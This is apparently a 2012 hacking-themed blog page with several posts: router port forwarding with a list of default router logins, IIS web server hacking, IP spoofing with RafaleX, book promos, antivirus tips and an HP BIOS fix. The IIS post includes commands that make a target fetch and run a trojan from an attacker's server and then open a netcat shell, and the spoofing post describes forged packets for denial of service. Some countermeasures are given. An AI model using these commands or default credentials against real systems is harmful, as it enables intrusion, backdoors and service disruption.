100% Free Free Free Download No Hide Charges No Sign up No virus Daily Update Blogger Templates
Showing posts with label Free E-Book Tutorial. Show all posts
Showing posts with label Free E-Book Tutorial. Show all posts

Tuesday, October 23, 2012

How To Port Forward (Router & Modem Style)

No comments:
What Is Portforwarding?

Port forwarding is necessary for using different tools, Such as RATs and uTorrent and so on. Please follow this guide on How To Port Forward and you'll have your port forwarded :)!


Today i'll teach you how to port forward through the router & modem. (Not with PFConfig :) )

Lets Start!

Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG
[Image: FASDASD.png]

Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.
[Image: IP_2.png]

My username is Root - nothing. The router // modem accounts usually are theese:

Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)

Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)

User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.

And so on.

Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"

[Image: Ip_3.png]

[Image: DASDSAD.png]

Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Adress.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.

And When You've Saved The Settings, Go To Canyouseeme.org And Type Your Port In There, And If It Says

[Image: Ip_5.png]

Then You've Succeded Your Port Forwarding.

If It Says

[Image: Ip_6.png]

You've Failed. Then I Advice You To Take A Look At Portforward.com And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Learn How To Hack Web Servers

No comments:


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe 
The attacker can then use netcat to evoke the command shell
c:\>nc  80 
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

  • Install latest service pack from Microsoft.
  • Remove IPP printing from IIS Server
  • Install firewall and remove unused extensions
  • Implement aggressive network egress filtering
  • Use IISLockdown and URLScan utilities
  • Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

  • Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
  • This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
  • appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Download Free E-book Windows XP Hacks Second Edition

No comments:

 Second Edition



A smart collection of insider tips and tricks, Windows XP Hacks, Second Edition covers the XP operating system from start to finish. Among the multitude of topics addressed, this must-have resource includes extensive coverage of hot-button issues such as: security web browsing controlling the control panel removing uninstallable XP components pop-up ads You'll also find timesaving hacks for file distribution; digital media, such as iTunes; and high-visibility web software, services.
Download Windows Xp Hacks Second Edition Here.
................................................................................................................................................................................
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Monday, October 22, 2012

How to Spoofing IP Addresses

No comments:

This Tutorial Is Only For Educational Purposes.
Learn how to create custom IP packets Using tool RafaleX and Engage Packet Builder
[Image: 1.JPG]The RafaleX application allows for the creation of custom IP packets. The packet is very customizable and allows for the spoofing of the IP, setting the flags, number of packets, and so forth. RafaleX is becoming hard to locate on the Internet as it appears it is now called Engage Packet Builder.

The RafaleX application is an excellent way to “spoof” custom packets. Attackers can place a valid IP address as the source of the packet and the target will have to attempt to respond to the spoofed address. By sending hundreds of thousands of packets in this manner, an attacker can create a Denial of Service attack against a target.

In this example, the Source IP of the packets to be sent is set to 10.10.10.10 with the source address of port 123. According to Internet etiquette, this should never be able to route on the Internet as the 10.x.x.x range is reserved for Private addressing. Set the destination IP to the target address. In this example it is 172.16.1.40. Set the Destination
port to port 21. The SYN and ACK flags were set for each packet.

*Note: The Ethernet communications process requires a three-way handshake:

SYN: Synchronize
SYN-ACK: Synchronize-Acknowledge
ACK: Acknowledge

When a computer receives an uninitiated SYN-ACK packet its response is to send a RST (Reset) packet.
[Image: 2.JPG]

The number of packets was set to 100. Click the Send button to send the packets to the target. The Status area at the bottom left of the application will tell you that the packets were sent.

[Image: 3.JPG]

The proof is below screen shot captured from packet capturing tool:
[Image: 4.JPG]
[Image: 5.JPG]
...............................................................................................................................................................................
...............................................................................................................................................................................
............................................................................................................................................................................... 

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Saturday, October 6, 2012

Amazinh Book Download Hacking Gps Book Free

No comments:

  • This is the "user manual" that didn't come with any of the 30 million GPS receivers currently in use, showing readers how to modify, tweak, and hack their GPS to take it to new levels!
  • Crazy-cool modifications include exploiting secret keycodes, revealing hidden features, building power cords and cables, hacking the battery and antenna, protecting a GPS from impact and falls, making a screen protector, and solar-powering a GPS
  • Potential power users will take the function and performance of their GPS to a whole new level by hacking into the firmware and hacking into a PC connection with a GPS
  • Fear not! Any potentially dangerous mod (to the device) is clearly labeled, with precautions listed that should be taken
  •  Game time! Readers can check out GPS games, check into hacking geocaching, and even use a GPS as a metal detector

http://hackersunrise.blogsopt.in
Read More!

Friday, September 21, 2012

Prevention from Virus, Worm, & Trojan

4 comments:

As you all already know, you can prevent yourself from Virus, Worm, & Trojan by using an antivirus or internet security or security program.
But I want to inform your some other ways to protect yourself.

  • Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it?s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
  • Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Fire fox).
  • Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, , and .avi), you are probably safe, but still do a scan before opening. 
  • As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

    � Don?t click on pop-up windows that announce a sudden disaster in your city or announce that you?ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them. � You can also use a pop-up blocker to automatically block those pop-ups.
  • USB thumb/pen drives are another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option "open?. This is a safe way to open a pen drive. 
  • Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG Link Scanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites. 
  • nstall a good Antispyware program that operates against Internet malware and spy ware. 
  • Install good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from viruses. If PC security is your first option then it is recommended that you go for shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides real-time security for your PC. Make sure that this feature is turned on.
  • Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out. 
  • Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software. 
  • While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

    12-And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.
And, after all, you can use any one from this program for maximum security:
1.Bitdefender.
2.Kaspersky.
3.Norton.
4.ESET Nod32.
5.AVG


We recommend kaspersky and its best, so i also recommend you kaspersky, you can trust on it, it provides best high level security, and have powerful functions, like parental control, firewall, safe run desktop and so many unique feature.

Never disable your security program and update it regularly.

You can also use autorun file remover this will prevent viruses, worm and trojan to spread on your system.
https://hackersunrise.blogsopt.in
Read More!

Wednesday, August 29, 2012

Free Hacking Wallpaper

No comments:

Your wallpaper is the great source of motivation for everything you do in  computers. You should set your wallpaper such that it reflects your goal. Its better if you use selfmade wallpapers. Amoung below wallpapers there is one wallpaper created by me, quated “This is my world , im the creator “.



https://hackersunrise.blogsopt.in
Read More!

Monday, August 6, 2012

Resolve The Error 912 - The computer has been removed in the HP Compaq dx2700 MT

No comments:
On the Desktop computer HP Compaq dx 2700, after opening the cover of CPU case (altough it has been closed back again), when starting the computer,  there will be the alarm tone sound is quite disturbing.
And we must press the F1 key to continue loading the OS (Operating System). And this will continue on every time the computer is restarted.


The warning is : error  912 - The computer has been removed. The machinecover has been removed
since last system start up. please Ensure That any system access wasauthorized.

To solve this problem:
• Turn the computer on
• Press F10 to enter the BIOS setup, wait for about 10 seconds
• Find the Hardware Monitor Setup menu (use arrow keys), select then press enter
• On Reset Case Open Status, change value  from Disable to Enable (use + on the numeric pad on the right side of the keyboard to change the value)



• Press F10 to save the configuration, press Enter.
Read More!